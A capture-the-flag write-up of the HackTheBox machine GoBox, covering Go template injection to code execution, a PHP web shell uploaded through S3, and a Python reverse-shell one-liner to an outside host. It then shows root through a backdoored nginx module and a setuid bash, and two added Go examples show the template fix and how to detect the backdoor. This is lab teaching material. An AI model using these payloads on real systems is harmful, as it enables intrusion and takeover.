Enumeration/Scanning With Nmap
We always start with an nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat nmap.nmap
# Nmap 7.91 scan initiated Tue Sep 7 13:14:57 2021 as: nmap -sC -sV -oA nmap 10.10.11.113
Nmap scan report for 10.10.11.113
Host is up (0.78s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports |
8080/tcp open http nginx
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 7 13:17:49 2021 -- 1 IP address (1 host up) scanned in 171.57 seconds
We have 3 open ports, 22, 80 and 8080, which seems cool; the rest are filtered. Now let's go through port 80 first, which is HTTP.
A nice homepage, I will say lol. Checking robots.txt:
Nothing, but it seems we have a double index page: index.html and index.php.
index.html brings up a test page only, while index.php brings up the normal homepage. I tried brute-forcing some directories but got nothing interesting, so now it's time to jump to port 8080.
A login page. Is it vulnerable to SQL injection? Let's give it a try. I spent some time on the login page and got nothing, but checking the title of the login page I found something strange: the title looks like an SSTI (Server Side Template Injection) payload.
So I clicked on the forgot password page to test it for SSTI, but knowing the template engine will help a lot, so I tried intercepting the request with Burp Suite.
Nice, checking the response I can see X-Forwarded-Server: golang.
Ahhh, it seems the server is written in Go. I know it's running nginx as well, but the template engine is Go, yes it's the same, so I quickly hit Google to find some SSTI payloads for Go.
Found a cool website that explains more about exploiting SSTI in Go: SSTI In Go.
Sent the request to Repeater to try my payload and I got Email Sent To: ssti.
Nice, a work in progress, let's dig more.
Ahhh cool, got some creds to log into the website, but nothing interesting, it's just source code.
Now trying to get RCE; the DebugCmd function looks interesting.
func (u User) DebugCmd(test string) string {
	ipp := strings.Split(test, " ")
	bin := strings.Join(ipp[:1], " ")
	args := strings.Join(ipp[1:], " ")
	if len(args) > 0 {
		out, _ := exec.Command(bin, args).CombinedOutput()
		return string(out)
	} else {
		out, _ := exec.Command(bin).CombinedOutput()
		return string(out)
	}
}
It isn't used anywhere else in the page, but it exists. Using Functions Inside Go Templates: this post talks about how to reference objects (including functions) from the templating engine using .function_name. Submitting `` returns proof of execution.
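To show why an exported method like DebugCmd becomes reachable at all, here is an added Go example (not the GoBox source or the post's own code) that puts the vulnerable pattern, user input concatenated into the template text, next to the fix, user input passed only as data. The User type and its harmless Marker method are constructed stand-ins for the real object and for DebugCmd.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
)

// User stands in for the object GoBox fed its templates (constructed here).
type User struct {
	Email string
}

// Marker is a harmless stand-in for DebugCmd: a template that can call it could
// call any other exported method on the same object.
func (u User) Marker() string { return "MARKER-FROM-METHOD" }

// RenderUntrusted is the vulnerable pattern: user input becomes part of the
// template text, so "{{.Marker}}" is parsed and executed, not printed.
func RenderUntrusted(input string) (string, error) {
	tmpl, err := template.New("vuln").Parse("Email Sent To: " + input)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, User{Email: input}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// safeTmpl is compiled once from a constant; user input only ever arrives as data.
var safeTmpl = template.Must(template.New("safe").Parse("Email Sent To: {{.Email}}"))

// RenderSafe is the fix: the same input is substituted as a value, so the braces
// reach the page verbatim and no method is ever looked up.
func RenderSafe(input string) (string, error) {
	var buf bytes.Buffer
	if err := safeTmpl.Execute(&buf, User{Email: input}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	probe := "{{.Marker}}" // constructed probe, same idea as the "ssti" test above
	v, _ := RenderUntrusted(probe)
	s, _ := RenderSafe(probe)
	fmt.Printf("untrusted: %q\nsafe:      %q\n", v, s)
}
```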
Boom, we have RCE. I was stuck here for long, man; I kept trying to get a reverse shell back to my terminal but no luck, I tried different reverse shell payloads but got nothing. Let's try checking the hostname.
AWS, cool, and it seems we are in a Docker environment as well; the hostname gives a clear hint that we are dealing with an S3 bucket.
AWS Command
aws s3 ls # list buckets
aws s3 ls s3://website
Ahhh, it seems the bucket is served on port 80. Nice, now let's try to upload a file to the target.
UPLOADING A FILE WITH THE RCE AND USING AWS To TRANSFER IT TO PORT 80
<?php echo system($_GET["cmd"]); ?>
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat shell.php | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4K
Let's confirm that we have our file in the tmp directory.
Ahhh awesome, we have it. Now let's copy it to port 80 with aws.
aws s3 cp /tmp/rev s3://website/rev.php
Now let's confirm it on port 80, which is HTTP.
Boom, a webshell. Now let's get a reverse shell back to our terminal.
SHELL
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let's spawn a TTY shell.
python3 -c 'import pty; pty.spawn ("/bin/bash")'
Now let's get user.txt in the home directory of the user ubuntu.
Privilege Escalation
Ahhh, the hard part, man. I was stuck here for so long, all thanks to my buddy c3p0d4y for the nudge, I love you man, so let's hit it. The root part is pretty new to me, like damn, it was fun.
Checked the kernel version, thinking it might be vulnerable to OverlayFS, but it's probably patched lol. Let's check the ports that are listening locally on the target.
www-data@gobox:~/html$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:4566 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9001 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::9000 :::* LISTEN -
tcp6 0 0 :::9001 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
www-data@gobox:~/html$
We have some pretty strange ports, and the hint I got was to dig into /etc/nginx/modules-enabled, thanks again c3p0d4y.
50-backdoor.conf looks strange, let's dig into it.
So I decided to find out more about the module, so I hit Google to do some research on it.
The first one looks promising, let's check it out.
The NginxExecute module executes the shell command through GET and POST to display the result.
Configuration example:
location ... {
    ......
    command on;
}

worker_processes 2;
events {
    worker_connections 1024;
}
http {
    include mime.types;
    default_type application/octet-stream;
    sendfile on;
    keepalive_timeout 65;
    server {
        listen 80;
        server_name localhost;
        location / {
            root html;
            index index.html index.htm;
            command on;
        }
        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
            root html;
        }
    }
}
Usage: view-source:http://192.168.18.22/?system.run[command] or curl -g "http://192.168.18.22/?system.run[command]" The command can be any system command. The command you will want to use depends on the permissions that nginx runs with.
view-source:http://192.168.18.22/?system.run[ifconfig]
Let's locate the module on the target.
But when I tried it, it failed.
So I decided to run strings on the module.
ippsec.run
Now let's try it again.
Boom, that is some good sh*t lol, now let's get the flag.
We have the root flag, but man, that is not fun without a real root shell lol.
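From the defender's side, the two things that gave this backdoor away were an extra load_module config in modules-enabled and a "<word>.run" trigger string inside the module, which only showed up once the default system.run was swapped for ippsec.run. This added Go example (not from the write-up or the module's project) automates both checks; the module file name and the fake module image it scans are constructed samples.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Matches an nginx "load_module /path/mod.so;" directive.
var loadModuleRe = regexp.MustCompile(`(?m)^\s*load_module\s+(\S+?)\s*;`)
// Matches the "<word>.run" trigger shape: NginxExecute's "system.run" and GoBox's "ippsec.run".
var triggerRe = regexp.MustCompile(`^[A-Za-z0-9_]+\.run$`)

// LoadedModules returns every module path declared in an nginx config fragment
// (e.g. the contents of /etc/nginx/modules-enabled/*.conf on Ubuntu), so each
// path can be compared with what the distribution package actually installed.
func LoadedModules(conf string) []string {
	var mods []string
	for _, m := range loadModuleRe.FindAllStringSubmatch(conf, -1) {
		mods = append(mods, m[1])
	}
	return mods
}

// TriggerCandidates does what `strings` did in the write-up: it pulls runs of
// printable ASCII out of a module image and keeps those shaped like a trigger,
// so a renamed trigger still stands out without knowing its name in advance.
func TriggerCandidates(image []byte) []string {
	var found []string
	var run strings.Builder
	flush := func() {
		if triggerRe.MatchString(run.String()) {
			found = append(found, run.String())
		}
		run.Reset()
	}
	for _, b := range image {
		if b >= 0x20 && b <= 0x7e {
			run.WriteByte(b)
		} else {
			flush()
		}
	}
	flush()
	return found
}

func main() {
	// Constructed sample: a conf like 50-backdoor.conf and a fake module image.
	conf := "load_module /usr/lib/nginx/modules/ngx_http_execute_module.so;\n"
	image := []byte("\x7fELF\x00ngx_http_module\x00ippsec.run\x00system.run\x00")
	fmt.Println(LoadedModules(conf), TriggerCandidates(image))
}
```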
www-data@gobox:/usr/lib/nginx/modules$ curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
<://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ ls /tmp/bash
ls /tmp/bash
/tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ ls -la /tmp/bash
ls -la /tmp/bash
-rwxrwxrwx 1 root root 1183448 Sep 8 17:16 /tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gobox:/usr/lib/nginx/modules$ curl 'http://127.0.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
<.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
bash-5.0# cd /root
cd /root
bash-5.0# ls
ls
iptables.sh root.txt snap
bash-5.0#
With some trial and error I got it, and we are done.
Greetings From Muzec